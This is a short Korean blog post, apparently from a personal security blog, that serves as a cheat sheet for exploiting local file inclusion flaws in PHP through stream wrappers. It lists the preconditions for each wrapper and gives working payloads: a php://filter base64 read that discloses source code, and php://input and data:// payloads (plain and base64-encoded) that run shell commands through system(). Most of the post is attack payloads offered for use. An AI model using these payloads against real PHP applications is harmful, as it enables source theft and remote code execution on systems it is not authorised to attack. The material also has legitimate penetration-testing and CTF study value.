카테고리 없음

Exploit LFI with PHP Protocols / Wrappers

2017. 11. 1. 21:16

Exploit LFI with PHP Protocols / Wrappers

본 글의 내용은 여기에서 많이 참고하였습니다. 



file://

 - controllable function : x 

 - allow_url_include : Off 

 - vulnerability type : LFI / File Manipulation 


glob://

- controllable function : x

 - allow_url_include : Off

 - vulnerability type : Directory Traversal 


php://filter/read 

 - controllable function : include 
 - allow_url_include : Off
 - vulnerability type : File Disclosure
php://filter/read=convert.base64-encode/resource=index.php


php://filter/write 

 - controllable function : file_put_contents 
 - allow_url_include : Off
 - vulnerability type : Encoding 
file_put_contents("php://filter/write=string.rot13/resource=x.txt","content");

php://input 

 - controllable function : include
 - allow_url_include : On
 - vulnerability type : RCE
<?php echo base64_encode(file_get_contents("solution.php"));?>
<?php system('cat x.php');?>

data://

 - controllable function : include 
 - allow_url_include : On
 - vulnerability type : RCE 
data:text/plain,<?php system("id")?>
data:text/plain;base64,PD9waHAgc3lzdGVtKCJpZCIpPz4=

zip:// 

 - controllable function : include + uploaded file 
 - allow_url_include : Off
 - vulnerability type : RCE 
zip://<Absolute path>

phar://

 - controllable function : include + uploaded file 
 - allow_url_include : Off
 - RCE
PHP Versin >= 5.3